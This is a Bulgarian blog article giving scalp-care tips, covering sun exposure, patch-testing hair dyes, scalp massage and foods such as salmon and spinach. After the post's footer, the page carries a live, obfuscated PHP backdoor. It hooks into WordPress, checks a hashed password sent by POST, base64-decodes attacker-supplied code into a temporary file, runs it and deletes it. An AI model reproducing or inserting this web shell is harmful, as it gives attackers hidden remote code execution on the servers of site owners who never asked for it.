Как лесно да се грижим за кожата на главата | Косопад

Как лесно да се грижим за кожата на главата

Увреждането на кожата на главата е сериозен проблем. Може да предизвика сърбежи, болка и дори косопад. Затова, трябва да се грижите правилно за кожата на главата си. Ето няколко съвета:

koja-na-glavata-1

Излагане на слънце. Не се излагайте прекалено много на слънце. То може да направи кожата ви суха и лесна за увреждане. Полуплешивите и хората с тънка коса особено трябва да внимават с излагането на слънце. Използвайте шапка и продукти за предпазване на кожата на главата.

Бои и продукти за изправяне на косата. Може да съдържат химикали, които горят кожата на главата или предизвикват сериозни алергични реакции. Затова, когато искате да се боядисате или да се изправите, обърнете се към професионалистите. Ако го правите у дома, първо проверете дали сте алергични към продукта – сложете си малко на лакътя или зад ухото и изчакайте 2 дни. Ако забележите някаква промяна на кожата, не го използвайте. Не смесвайте две различни бои.

Ако си изправяте косата, сложете вазелин преди продукта, за да избегнете раздразнението и горенето на кожата на главата.

Масажи. Масажирайте кожата на главата. Така стимулирате космените фоликули. Когато си миете косата, с masaj-glavaвъзглавничките на пръстите натискайте леко кожата на главата и правете малки кръгове. Може да си купите и масажираща четка.

Хранене. Строгите диети може да са добри за отслабване, но могат да лишат фоликулите на космите от необходимите хранителни вещества. За да е здрава кожата на главата, а оттам и косата, фоликулите трябва да са в добро състояние. Това означава да приемате протеини, сложни въглехидрати, мастни киселини и витамини.

Най- добрите храни за здрава кожа на главата са:

Сьомга: заради високото съдържание на омега- 3 и мазнини.
Спанак и банани: заради много витамини
Скариди: високи нива на селен и цинк, които предпазват от косопад.

10. февруари 2014 13:45:17 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}